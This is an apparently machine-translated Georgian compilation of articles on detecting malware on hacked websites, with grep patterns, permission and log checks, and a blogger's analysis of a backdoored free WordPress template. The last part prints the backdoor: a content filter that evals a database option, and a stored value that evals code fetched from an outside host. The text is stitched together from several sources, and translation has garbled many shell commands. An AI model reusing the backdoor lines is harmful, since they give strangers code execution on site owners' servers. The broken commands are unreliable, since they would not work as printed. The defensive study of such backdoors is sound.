ყველა ვებმასტერს შეექმნა პრობლემა, რომ აღმოაჩინოს დაუცველობა საკუთარ ვებსაიტზე, რომლის დახმარებით თავდამსხმელს შეუძლია ატვირთოს თავისი მავნე კოდი, რაც ამა თუ იმ გზით იმოქმედებს მთელი საიტის მუშაობაზე, ძიების შედეგებიდან მის გამორიცხვამდე.

ყველაზე ხშირად, ინფექცია ხდება იმის გამო ადამიანური ფაქტორი, მაგრამ რა უნდა გააკეთოს, თუ საიტი გატეხილია?

ძირითადი პრობლემები

ნაკლები ბოროტება არის თავად მავნე კოდის პოვნა და ამოღება. მთავარი პრობლემა არის დაუცველი ადგილის პოვნა, რომლის მეშვეობითაც თავდამსხმელმა ატვირთა თავისი კოდი თქვენს საიტზე, რათა დაიცვას თავი შემდგომი მსგავსი პრეცედენტებისაგან.

ბევრი დაიწერა მავნე კოდის ძიების შესახებ. ანტივირუსული პროგრამები, შეიქმნა მრავალი სერვისი, რომელსაც შეუძლია მიუთითოს ინფიცირებული გვერდის მისამართი, თვით ვირუსის შესახებ ხელმოწერისა და ამომწურავი ინფორმაციის მიწოდებაც კი. მაგრამ არცერთი პროგრამული უზრუნველყოფავერ გეტყვით, როგორ გამოჩნდა ეს „უცხო კოდი“ საიტზე. აქ მხოლოდ საკუთარ თავს უნდა დაეყრდნოთ.

ქვემოთ მივცემ რამდენიმე ბრძანებას, რომლებიც შეიძლება გამოყენებულ იქნას თქვენს ვებსაიტზე ატვირთული ინფიცირებული ფაილების და/ან ჭურვების/უკანა კარების ძებნისას. ამისათვის ჩვენ გვჭირდება Putty პროგრამა და SSH წვდომა საიტზე.

მოძებნეთ ინფიცირებული ფაილები

შემდეგი ბრძანებების გამოყენებით, შეგიძლიათ იპოვოთ ფაილები, რომლებიც შეიცავს „საშიშ“ ელემენტებს, რომლებიც შეიძლება გამოიყენოს თავდამსხმელმა მავნე ბუნდოვანი კოდის შესასრულებლად.

ფაილების გამომავალი ჩაიწერება ჟურნალის ფაილში თქვენს მიმდინარე დირექტორიაში. თითოეული ფაილი შეიცავს ნაპოვნი ფაილის გზას და ხაზს კოდის საეჭვო განყოფილებით.

იპოვეთ /Directory საიტით -type f -iname "*" -exec grep -Him1 "eval" () \; > ./eval.log
იპოვეთ /Directory საიტით -type f -iname "*" -exec grep -Him1 "base64" () \; > ./base64.log
იპოვეთ /Directory საიტით -type f -iname "*" -exec grep -Him1 "file_get_contents" () \; > ./file_get_contents.log

დირექტორიების პოვნა სრული ჩაწერის ნებართვით

შემდეგი ბრძანება აჩვენებს დირექტორიების სიას, სადაც სრული უფლებებიჩასაწერად. ეს არის დირექტორიები, რომლებიც გამოიყენება ვებსაიტის დასაინფიცირებლად.

იპოვეთ ./დირექტორია ვებსაიტით -perm 777 -type d

მოძებნეთ შეცვლილი ფაილები გარკვეული პერიოდის განმავლობაში

თუ იცით დაახლოებით როდის მოხდა ინფექცია, შეგიძლიათ იხილოთ ბოლო რამდენიმე დღის განმავლობაში შეცვლილი ფაილების სია (–mtime -7 პარამეტრი მიუთითებს ცვლილების თარიღზე, ვიდრე მიმდინარე ბოლო 7 დღის განმავლობაში)

იპოვნეთ ./Directory ვებსაიტით -type f -inname "*" -mtime -7

რა უნდა გააკეთოს, თუ საიტი ინფიცირებულია?

ასე რომ, დავუშვათ, რომ ვიპოვეთ ინფიცირებული ფაილები ან ჭურვის ფაილი. სანამ მას წაშლით/მოხსნით მავნე კოდს, გახსოვდეთ მისი სახელი ( სრული გზა), ფაილის შეცვლის/შექმნის თარიღი, მისი gid და მომხმარებლის ID (for unix სისტემები), ეს საშუალებას მოგცემთ იპოვოთ გზა ატვირთოთ იგი ჩვენს საიტზე. დავიწყოთ მომხმარებლის და ჯგუფით:

ნახეთ, რომელ მომხმარებელს მუშაობს თქვენი ვებ სერვერი, როგორც:

ps-aux | grep "apache2" | awk ("დაბეჭდვა $1")

თუ ეს მომხმარებელი იგივე მომხმარებელია, ვინც შექმნა მავნე ფაილი, მაშინ შეიძლება ვივარაუდოთ, რომ ის გადმოწერილი იქნა თავად საიტის მეშვეობით. თუ არა, ფაილის ჩამოტვირთვა შეიძლებოდა ftp-ის საშუალებით (ჩვენ გირჩევთ შეცვალოთ პაროლები FTP სერვერზე და ადმინისტრაციული პანელისაიტი).

კატა ./site.ru.access.log | grep „სახელი ფაილის სახელიOfShellScript“

და ჩვენ ვიღებთ ყველა მოთხოვნას ჩვენს სკრიპტზე. მისი გამოყენებით ჩვენ განვსაზღვრავთ ჩვენი თავდამსხმელის userAgent და IP მისამართს.

შემდეგი ბრძანებით ვიღებთ ყველა იმ მოთხოვნის ჩამონათვალს, რომლებზეც ის ჩვენთან მოვიდა.

კატა ./site.ru.access.log | grep "ip" | grep "userAgent"

მისი გულდასმით გაანალიზებით, თქვენ შეგიძლიათ იპოვოთ დაუცველი ადგილი საიტზე, თქვენ უნდა გადაიხადოთ განსაკუთრებული ყურადღება POST მოთხოვნებს გამოსავალიდან, რომელიც შეიძლებოდა გამოყენებული ყოფილიყო მავნე ფაილის ასატვირთად.

ანდრეი იჟაკოვსკი, სისტემის ადმინისტრატორი

ცხოვრების სიმართლე ისაა, რომ საიტის გატეხვა ადრე თუ გვიან შეიძლება. დაუცველობის წარმატებით გამოყენების შემდეგ, ჰაკერი ცდილობს დაიმკვიდროს ადგილი საიტზე ჰაკერების ვებ ჭურვებისა და ჩამოტვირთვების სისტემის დირექტორიებში განთავსებით და სკრიპტის კოდსა და CMS მონაცემთა ბაზაში უკანა კარების დანერგვით.

ფაილებსა და მონაცემთა ბაზებში მავნე კოდის გამოსავლენად, არსებობს სპეციალიზებული გადაწყვეტილებები - ანტივირუსები და სკანერები ჰოსტინგისთვის. ბევრი მათგანი არ არის პოპულარული: AI-BOLIT, MalDet (Linux Malware Detector) და ClamAv.

სკანერები ხელს უწყობენ ჩატვირთული ვებ ჭურვების, უკანა კარების, ფიშინგის გვერდების, სპამის ელფოსტის და სხვა სახის მავნე სკრიპტების აღმოჩენას - ყველაფერი, რაც მათ იციან და წინასწარ დამატებულია მავნე კოდის ხელმოწერის მონაცემთა ბაზაში. ზოგიერთ სკანერს, როგორიცაა AI-BOLIT, აქვს ევრისტიკული წესების ნაკრები, რომელსაც შეუძლია აღმოაჩინოს ფაილები საეჭვო კოდით, რომლებიც ხშირად გამოიყენება მავნე სკრიპტებში, ან საეჭვო ატრიბუტების მქონე ფაილები, რომელთა ჩამოტვირთვა შესაძლებელია ჰაკერების მიერ. მაგრამ, სამწუხაროდ, ჰოსტინგზე რამდენიმე სკანერიც რომ იყოს გამოყენებული, შესაძლებელია სიტუაციები, როდესაც ზოგიერთი ჰაკერული სკრიპტი რჩება შეუმჩნეველი, რაც რეალურად ნიშნავს, რომ თავდამსხმელს რჩება "უკანა კარი" და მას შეუძლია გატეხოს საიტი და მოიპოვოს კონტროლი მასზე. სრული კონტროლინებისმიერ მომენტში.

თანამედროვე მავნე პროგრამები და ჰაკერული სკრიპტები მნიშვნელოვნად განსხვავდება 4-5 წლის წინანდელისგან. ამჟამად, მავნე კოდის შემქმნელები აერთიანებენ ბუნდოვანებას, დაშიფვრას, დაშლას, გარე დატვირთვამავნე კოდი და გამოიყენეთ სხვა ხრიკები ანტივირუსული პროგრამული უზრუნველყოფის მოსატყუებლად. ამიტომ, ახალი მავნე პროგრამის გამოტოვების ალბათობა გაცილებით მაღალია, ვიდრე ადრე.

რა შეიძლება გაკეთდეს მასში ამ შემთხვევაშისაიტზე ვირუსების და ჰაკერების სკრიპტების უფრო ეფექტური აღმოჩენისთვის ჰოსტინგზე? უნდა იყოს გამოყენებული ინტეგრირებული მიდგომა: საწყისი ავტომატური სკანირება და შემდგომი მექანიკური ანალიზი. ეს სტატია განიხილავს მავნე კოდის აღმოჩენის ვარიანტებს სკანერების გარეშე.

პირველ რიგში, მოდით შევხედოთ კონკრეტულად რა უნდა მოძებნოთ ჰაკის დროს.

ჰაკერული სკრიპტები.
ყველაზე ხშირად, ჰაკერების დროს, ჩამოტვირთული ფაილები არის ვებ ჭურვები, უკანა კარები, „ამტვირთველები“, სპამის წერილების სკრიპტები, ფიშინგის გვერდები + ფორმის დამმუშავებლები, კარიბჭეები და ჰაკერული მარკერის ფაილები (სურათები ლოგოთი ჰაკერების ჯგუფი, ტექსტური ფაილებიჰაკერების „მესიჯით“ და ა.შ.)

ინექციები (კოდის ინექციები) არსებულში.
მავნე და ჰაკერული კოდის განთავსების მეორე ყველაზე პოპულარული ტიპი არის ინექციები. IN არსებული ფაილები website.htaccess-ს შეუძლია მობილურის და ძებნის გადამისამართების ინექცია, php/perl სკრიპტებში უკანა კარების ინექცია, ვირუსული ჯავასკრიპტის ფრაგმენტების ჩასმა ან .js და .html შაბლონებში გადამისამართება. მესამე მხარის რესურსები. ინექციები ასევე შესაძლებელია მედია ფაილებში, მაგალითად.jpg ან. ხშირად მავნე კოდი შედგება რამდენიმე კომპონენტისგან: თავად მავნე კოდი ინახება exif სათაურში. jpg ფაილი, მაგრამ შესრულებულია მცირე საკონტროლო სკრიპტის გამოყენებით, რომლის კოდი სკანერისთვის საეჭვოდ არ გამოიყურება.

მონაცემთა ბაზის ინექციები.
მონაცემთა ბაზა არის მესამე სამიზნე ჰაკერისთვის. აქ შესაძლებელია სტატიკური ჩანართები, , , , რომლებიც გადამისამართებენ ვიზიტორებს მესამე მხარის რესურსებზე, „თვალთვალებენ“ მათ ან აზიანებენ ვიზიტორის კომპიუტერს/მობილურ მოწყობილობას Drive-by შეტევის შედეგად.
გარდა ამისა, ბევრ თანამედროვე CMS-ში (IPB, vBulletin, modx და ა.შ.) შაბლონის ძრავები საშუალებას გაძლევთ შეასრულოთ php კოდი, და თავად შაბლონები ინახება მონაცემთა ბაზაში, ასე რომ, ვებ ჭურვებისა და უკანა კარების PHP კოდი შეიძლება ჩაშენდეს პირდაპირ მონაცემთა ბაზაში.

ინექციები ქეშირების სერვისებში.
ქეშირების სერვისების არასწორი ან არაუსაფრთხო კონფიგურაციის შედეგად, მაგალითად, memcached, შესაძლებელია ინექციები ქეშირებულ მონაცემებში "ფრენაზე". ზოგიერთ შემთხვევაში, ჰაკერს შეუძლია მავნე კოდის შეყვანა საიტის გვერდებზე საიტის უშუალო გატეხვის გარეშე.

ინექციები / ინიცირებული ელემენტები შევიდა სისტემის კომპონენტებისერვერი.
თუ ჰაკერმა მოიპოვა სერვერზე პრივილეგირებული (root) წვდომა, მას შეუძლია შეცვალოს ვებ სერვერის ან ქეშირების სერვერის ელემენტები ინფიცირებულით. ასეთი ვებ სერვერი, ერთი მხრივ, უზრუნველყოფს სერვერზე კონტროლს საკონტროლო ბრძანებების გამოყენებით, ხოლო მეორე მხრივ, დროდადრო შემოაქვს დინამიური გადამისამართებები და მავნე კოდი საიტის გვერდებზე. როგორც ქეშირების სერვისში ინექციის შემთხვევაში, საიტის ადმინისტრატორი დიდი ალბათობით ვერ შეძლებს საიტის გატეხვის ფაქტს, რადგან ყველა ფაილი და მონაცემთა ბაზა ორიგინალური იქნება. ამ ვარიანტის მკურნალობა ყველაზე რთულია.

ასე რომ, დავუშვათ, რომ თქვენ უკვე შეამოწმეთ ფაილები ჰოსტინგზე და მონაცემთა ბაზის ნაგავსაყრელი სკანერებით, მაგრამ მათ ვერაფერი იპოვეს და ვირუსი ისევ გვერდზეა, ან მობილური გადამისამართება აგრძელებს მუშაობას გვერდების გახსნისას. როგორ მოძებნოთ შემდგომი?

ხელით ძიება

Unix-ზე ძნელია იპოვოთ უფრო ღირებული წყვილი ბრძანება ფაილების და ფრაგმენტების მოსაძებნად, ვიდრე find/grep.

იპოვე . -სახელი '*.ph*' -mtime -7

იპოვის ყველა ფაილს, რომელიც შეიცვალა დროს გასულ კვირას. ზოგჯერ ჰაკერები „უხვევენ“ სკრიპტების მოდიფიცირების თარიღს, რათა არ აღმოაჩინონ ახალი სკრიპტები. შემდეგ შეგიძლიათ მოძებნოთ php/phtml ფაილები, რომელთა ატრიბუტები შეიცვალა

იპოვე . -სახელი '*.ph*' -сtime -7

თუ თქვენ გჭირდებათ ცვლილებების პოვნა გარკვეული დროის ინტერვალში, შეგიძლიათ გამოიყენოთ იგივე პოვნა

იპოვე . -სახელი '*.ph*' -newermt 2015-01-25 ! -ახალი 2015-01-30 -ls

ფაილების მოსაძებნად, grep აუცილებელია. მას შეუძლია რეკურსიულად მოძებნოს ფაილებში მითითებული ფრაგმენტი

grep -ril 'stummann.net/steffen/google-analytics/jquery-1.6.5.min.js' *

სერვერის გატეხვისას სასარგებლოა ფაილების ანალიზი, რომლებსაც აქვთ სახელმძღვანელო/სუიდის დროშის ნაკრები

პოვნა / -პერმი -4000 -ო -პერმი -2000

იმის დასადგენად, თუ რომელი სკრიპტები მუშაობს ამჟამად და იტვირთება ჰოსტინგის CPU, შეგიძლიათ დარეკოთ

lsof +r 1 -p `ps axww | grep httpd | grep -v grep | awk ‘ ( if(!str) ( str=$1 ) else (str=str”,”$1))END(print str)” | grep vhosts | grep php

ჩვენ ვიყენებთ ჩვენს ტვინს და ხელებს ჰოსტინგის ფაილების გასაანალიზებლად

ჩვენ მივდივართ ატვირთვის, ქეშის, tmp-ის, სარეზერვო, ჟურნალის, სურათების საქაღალდეებში, რომლებშიც რაღაც იწერება სკრიპტებით ან ატვირთულია მომხმარებლების მიერ, და სკანირებს შიგთავსს ახალი ფაილებისთვის საეჭვო გაფართოებებით. მაგალითად, joomla-სთვის შეგიძლიათ შეამოწმოთ .php ფაილები images:find ./images -name ‘*.ph*’ დირექტორიაში დიდი ალბათობით, თუ რამე მოიძებნება, ეს იქნება მავნე პროგრამა.
WordPress-ისთვის აზრი აქვს wp-content/uploads დირექტორიას, სარეზერვო და ქეშის თემების დირექტორიების შემოწმებას სკრიპტებისთვის.

ვეძებთ ფაილებს უცნაური სახელებით
მაგალითად, php, fyi.php, n2fd2.php. ფაილების ძებნა შესაძლებელია

• სიმბოლოების არასტანდარტული კომბინაციებით,
• ფაილების სახელებში 3,4,5,6,7,8,9 ნომრების არსებობა

ჩვენ ვეძებთ ფაილებს უჩვეულო გაფართოებით
ვთქვათ, თქვენ გაქვთ ვებსაიტი WordPress-ზე ან მათთვის ფაილები გაფართოებებით .py, .pl, .cgi, .so, .c, .phtml, .php3 არ იქნება ჩვეულებრივი. თუ აღმოჩენილია რაიმე სკრიპტი და ფაილი ამ გაფართოებით, სავარაუდოდ, ისინი იქნება ჰაკერული ინსტრუმენტები. ცრუ აღმოჩენების პროცენტი შესაძლებელია, მაგრამ არ არის მაღალი.

ჩვენ ვეძებთ ფაილებს არასტანდარტული ატრიბუტებით ან შექმნის თარიღით
ეჭვი შეიძლება გამოწვეული იყოს სერვერზე არსებული ატრიბუტების მქონე ფაილებით. მაგალითად, ყველა. აზრი აქვს უახლესების შემოწმებას. ან თუ სკრიპტის ფაილის შექმნის თარიღი თარიღამდევებსაიტის შექმნა.
საეჭვო ატრიბუტების მქონე ფაილების ძიების დასაჩქარებლად, მოსახერხებელია მისი გამოყენება unix ბრძანებაიპოვე.

ჩვენ ვეძებთ კარებს დიდი რაოდენობა.html ან .php ფაილები
თუ დირექტორიაში არის რამდენიმე ათასი .php ან .html ფაილი, ეს სავარაუდოდ კარიბჭეა.

ჟურნალები დასახმარებლად

ვებ სერვერის ჟურნალები, საფოსტო მომსახურებადა FTP შეიძლება გამოყენებულ იქნას მავნე და ჰაკერული სკრიპტების გამოსავლენად.

• წერილის გაგზავნის თარიღისა და დროის კორელაცია (რომელიც შეგიძლიათ იხილოთ ჟურნალიდან ფოსტის სერვერიან სპამის წერილის სერვისის სათაური) თხოვნებით access_log-ისგან, რომელიც ეხმარება სპამის გაგზავნის მეთოდის იდენტიფიცირებას ან სპამის გამგზავნის სკრიპტის პოვნას.

• FTP xferlog გადაცემის ჟურნალის ანალიზი საშუალებას გაძლევთ გაიგოთ, რომელი ფაილები იყო გადმოწერილი ჰაკერების დროს, რომელი შეიცვალა და ვის მიერ.

• სწორად კონფიგურირებულ ფოსტის სერვერის ჟურნალში ან სპამის ელ.ფოსტის სერვისის სათაურში სწორი PHP პარამეტრებიიქნება სახელი ან სრული გზა გაგზავნის სკრიპტისკენ, რაც დაგეხმარებათ სპამის წყაროს დადგენაში.

• თანამედროვე CMS-ისა და დანამატების პროაქტიული დაცვის ჟურნალების გამოყენებით, შეგიძლიათ განსაზღვროთ რა შეტევები განხორციელდა საიტზე და შეძლო თუ არა CMS-მა მათ წინააღმდეგობა.

• Access_log-ისა და error_log-ის გამოყენებით, შეგიძლიათ გაანალიზოთ ჰაკერის ქმედებები, თუ იცით იმ სკრიპტების სახელები, რომლებსაც მან დაურეკა, IP მისამართი ან მომხმარებლის აგენტი. როგორც ბოლო საშუალება, შეგიძლიათ ნახოთ POST-ის მოთხოვნებისაიტის გატეხვისა და დაინფიცირების დღეს. ხშირად ანალიზი საშუალებას გაძლევთ იპოვოთ სხვა ჰაკერული სკრიპტები, რომლებიც ჩამოტვირთული იყო ან უკვე იყო სერვერზე გატეხვის დროს.

მთლიანობის კონტროლი

გაცილებით ადვილია ჰაკის ანალიზი და ვებსაიტზე მავნე სკრიპტების ძებნა, თუ წინასწარ იზრუნებ მის უსაფრთხოებაზე. მთლიანობის შემოწმების პროცედურა ხელს უწყობს ჰოსტინგში ცვლილებების დროულად აღმოჩენას და ჰაკერების ფაქტის დადგენას. ერთ-ერთი უმარტივესი და ეფექტური გზები– მოათავსეთ საიტი ვერსიების კონტროლის სისტემაში (git, svn, cvs). თუ თქვენ სწორად დააკონფიგურირებთ .gitignore, ცვლილების კონტროლის პროცესი გამოწვევას ჰგავს git ბრძანებებისტატუსი და მოძებნეთ მავნე სკრიპტები და შეცვლილი ფაილები - git diff.

ასევე ყოველთვის გექნებათ სარეზერვოფაილები, რომლებზეც შეგიძლიათ საიტის „დაბრუნება“ რამდენიმე წამში. სერვერის ადმინისტრატორებს და მოწინავე ვებმასტერებს შეუძლიათ გამოიყენონ inotify, tripwire, აუდიტი და სხვა მექანიზმები, რათა თვალყური ადევნონ ფაილებსა და დირექტორიაში წვდომას და აკონტროლონ ცვლილებები ფაილურ სისტემაში.

სამწუხაროდ, ყოველთვის არ არის შესაძლებელი ვერსიის კონტროლის სისტემის დაყენება ან მესამე მხარის მომსახურებასერვერზე. საზიარო ჰოსტინგის შემთხვევაში ვერ იქნება ვერსიის კონტროლის სისტემის დაყენება და სისტემური მომსახურება. მაგრამ არ აქვს მნიშვნელობა, ბევრია მზა გადაწყვეტილებები CMS-ისთვის. შეგიძლიათ დააინსტალიროთ დანამატი საიტზე ან ცალკე სცენარი, რომელიც თვალყურს ადევნებს ფაილებში ცვლილებებს. ზოგიერთი CMS უკვე ახორციელებს ცვლილებების ეფექტურ მონიტორინგს და მთლიანობის შემოწმების მექანიზმს (მაგალითად, Bitrix, DLE). როგორც ბოლო საშუალება, თუ ჰოსტინგს აქვს ssh, შეგიძლიათ შექმნათ საცნობარო კასტი ფაილური სისტემაგუნდი

ls -lahR > original_file.txt

და თუ პრობლემები წარმოიქმნება, შექმენით ახალი სნეპშოტი სხვა ფაილში და შემდეგ შეადარეთ ისინი WinDiff-ში, AraxisMerge Tool-ში ან BeyondCompare-ში.

ეპილოგი

უმეტეს შემთხვევაში, ანტივირუსული პროგრამული უზრუნველყოფის შემქმნელები და სკანერები არ ემორჩილებიან მავნე კოდის შემქმნელებს, ასე რომ, საიტების დიაგნოსტიკისა და მკურნალობისას, თქვენ არ შეგიძლიათ დაეყრდნოთ მხოლოდ ავტომატიზებულს. პროგრამული გადაწყვეტილებებიდა სკრიპტები. ევრისტიკული მიდგომის, მდიდარი ინსტრუმენტების გამოყენება ოპერაციული სისტემადა CMS შესაძლებლობებიშეგიძლიათ იპოვოთ მავნე კოდი, რომელიც ანტივირუსებმა და სკანერებმა ვერ აღმოაჩინეს. სახელმძღვანელო ანალიზის გამოყენება ვებსაიტის მკურნალობის პროცესს უკეთესს და ეფექტურს ხდის.

გამარჯობა მეგობრებო. დარწმუნებული ხარ რომ უფასოა? WordPress შაბლონი, რომელსაც იყენებთ თქვენი ვებსაიტებისა და ბლოგებისთვის, ნამდვილად უსაფრთხოა და არ შეიცავს ფარული საფრთხეებიდა მავნე კოდი? ამაში სრულიად დარწმუნებული ხარ? აბსოლუტურად?)

როგორ ფიქრობთ, შაბლონი გაშვებულია, ამოღებულია? ფარული ბმულებიდა სამუშაო დასრულებულია. თქვენ პერიოდულად სკანირებთ საიტის ფაილებს ანტივირუსით, ათვალიერებთ Yandex ვებმასტერის ინსტრუმენტებს უსაფრთხოების ჩანართში და შვებით ხედავთ შეტყობინებას იქ: ” საიტზე მავნე კოდი არ იქნა აღმოჩენილი«.

მეც ასე ვფიქრობდი. არ მინდა შენი გაწყენინება, მაგრამ...

დამალული საშიში კოდი WordPress-ის უფასო შაბლონებში

ეს არის წერილი მე მივიღე გასულ კვირასელექტრონული ფოსტით თქვენი ჰოსტინგიდან. ცოტა ხნის წინ, მათ შემოიღეს საიტის ყველა ფაილის რეგულარული შემოწმება მავნე შინაარსის მოსაძებნად და მათ ეს კონტენტი ჩემზე იპოვეს!

ეს ყველაფერი დაიწყო, როდესაც ერთ შუადღეს შევედი ჩემს ვებსაიტზე და ვერ გავხსენი - გამოჩნდა შეურაცხმყოფელი შეტყობინება ფაილების შესახებ, რომლებიც ვერ მოიძებნა php გაფართოება. ცოტა დავიძაბე, წავედი საქაღალდის შინაარსის შესასწავლად საიტთან ჰოსტინგზე და მაშინვე აღმოვაჩინე პრობლემა - ჩემს შაბლონის ფაილს fuctions.php დაარქვეს functions.php.malware, რაც თითქოს ორაზროვანად მიანიშნებდა - ანტივირუსი იყო. აქ ვმუშაობ ან მსგავსი რამ) მეილზე წასვლის შემდეგ ვიპოვე ზემოთ მოხსენება ჰოსტერისგან.

პირველი რაც გავაკეთე, რა თქმა უნდა, შემოწმება იყო ამ ფაილს, შეისწავლა მისი შინაარსი, დასკანერდა ყველა სახის ანტივირუსით, ათეულობით ონლაინ სერვისებივირუსების შესამოწმებლად და ა.შ. — საბოლოოდ, ვერაფერი იპოვეს, ყველამ ერთხმად დაადასტურა, რომ ფაილი სრულიად უსაფრთხო იყო. რა თქმა უნდა, მე გამოვუცხადე ეჭვი მასტერს და ვუთხარი, რომ თქვენ რაღაც შეშალეთ, მაგრამ ყოველი შემთხვევისთვის, ვთხოვე, მოგეწოდებინათ ანგარიში მავნე კოდის აღმოჩენის შესახებ.

და აი რა მიპასუხეს

წავედი გუგლის ინფორმაციაზე ამ კოდის შესახებ და სერიოზულად დავფიქრდი...

როგორ მოვძებნოთ მავნე კოდის ნაწილი შაბლონში

როგორც ირკვევა, ეს ნამდვილად არატრივიალური ტექნიკაა, რომელიც საშუალებას აძლევს დაინტერესებულ პირებს გადასცენ მონაცემები თქვენს საიტზე და შეცვალონ გვერდების შინაარსი თქვენი ცოდნის გარეშე! თუ იყენებთ უფასო შაბლონს, გირჩევთ შეამოწმოთ თქვენი functions.php შემდეგი კოდისთვის:

add_filter('the_content', '_bloginfo', 10001);
ფუნქცია _bloginfo($content)(
გლობალური $პოსტი;
if(is_single() && ($co=@eval(get_option('blogoption'))) !== false)(
დაბრუნება $co;
) სხვა შემთხვევაში დააბრუნეთ $content;
}

php-ის ძალიან არაღრმა ცოდნითაც კი, ცხადია, რომ იქმნება გარკვეული ფილტრი, რომელიც დაკავშირებულია გლობალურთან. პოსტის ცვლადიდა კონტენტი პასუხისმგებელია კონტენტის ჩვენებაზე მხოლოდ ბლოგის პოსტის გვერდებზე (is_single condition). უკვე საეჭვოა არა? აბა, ახლა ვნახოთ, რას გამოვა. ეს კოდიჩვენს ვებგვერდზე.

მონაცემთა ბაზაში მოთხოვნილი ბლოგოპციის საინტერესო ვარიანტი ასევე ძალიან საეჭვოდ გამოიყურება. მოდით გადავიდეთ ჩვენს მონაცემთა ბაზაში MySQL მონაცემებიდა იპოვნეთ იქ ცხრილი სახელწოდებით wp_options, თუ პრეფიქსები არ შეცვალეთ, ნაგულისხმევად ასე გამოიყურება. და მასში ვპოულობთ იმ ხაზს, რომელიც გვაინტერესებს, რომელსაც ბლოგოპცია ეწოდება

რა სილამაზეა! ჩვენ ვხედავთ შემდეგი ვარიანტი

return eval(file_get_contents('http://wpru.ru/aksimet.php?id='.$post->ID.'&m=47&n'));

იმათ. გარკვეული საიტიდან (და რუსულიდან, გაითვალისწინეთ) ისინი აბრუნებენ კონტენტს, რომელიც შეიძლება შეიცავდეს ყველაფერს! ნებისმიერი რაოდენობის ბმული, მავნე კოდები, შეცვლილი ტექსტი და ა.შ. თავად საიტი იძლევა 403 წვდომის შეცდომას მასზე შესვლისას, რაც გასაკვირი არ არის. რა თქმა უნდა, ეს ვარიანტიც ამოვიღე მონაცემთა ბაზიდან.

მსხვერპლის ინფორმაციით, თქვენი სტატიის ზუსტი შინაარსი ჩვეულებრივ ბრუნდება მხოლოდ ერთი მოდიფიკაციით - ნებისმიერი წერტილის ნაცვლად. ტექსტში შენიღბული გახსენი ბმული! და სხვათა შორის, ეს ვარიანტიიწერება მონაცემთა ბაზაში, როდესაც თავად შაბლონი დაინსტალირდება, შემდეგ კი კოდი, რომელიც ამას წარმატებით აკეთებს, თვითგანადგურებულია. და ორი წელი ვიცხოვრე ასეთ ნაგავთან ერთად და არც ერთ ანტივირუსს ან სერვისს არ დაუფიქსირებია ჩემთვის ეს საფრთხე მთელი ამ ხნის განმავლობაში. მართალი გითხრათ, ვერ შევამჩნიე, ოდესმე მუშაობდა თუ არა ამ ტექნიკამ, ან დაბლოკა თუ არა ჩემმა უსაფრთხოების მოდულმა ეს ფუნქცია (ან შესაძლოა WordPress-ის ერთ-ერთმა განახლებამ დახურა ეს ხვრელი), მაგრამ მაინც უსიამოვნოა.

მორალი უფასო ყველის შესახებ

როგორ მოგწონთ შაბლონების ჩვენი „მთარგმნელების“ დახვეწილობა (ან მათ, ვინც მათ კატალოგებში აქვეყნებს)? ეს არ არის შენთვის, რომ ამოჭრა ლინკები ქვედა კოლონტიტულიდან) სამწუხაროა, რომ არ მახსოვს საიდან გადმოვწერე ჩემი შაბლონი, ეს იყო დიდი ხნის წინ, თორემ აუცილებლად დავწერდი რამდენიმე მოსიყვარულე. და იმ დროს რომ მქონოდა იგივე გამოცდილება, რაც ახლა მაქვს, ნამდვილად არ გამოვიყენებდი უფასო შაბლონი, ან უკიდურეს შემთხვევაშიუცნობი წყაროებიდან არ ჩამოვტვირთავ!

უფრო ადვილია იყიდო ოფიციალური პრემიუმ შაბლონი 15-20 დოლარად და იცხოვრო მშვიდად, იმის ცოდნა, რომ მასში არ არის ხვრელები ან დაშიფრული ბმულები, და თუნდაც დაუცველობა იყოს, დეველოპერები აუცილებლად გამოაქვეყნებენ განახლებას, რომელშიც ეს ხვრელები იქნება. დახურული. (სხვათა შორის, არტემმა ახლახან გამოაქვეყნა სტატია, სადაც ის საუბრობს პრემიუმ შაბლონებზე და დაინტერესებულთათვის სასტიკი ფასდაკლების სარეკლამო კოდებსაც კი აძლევს)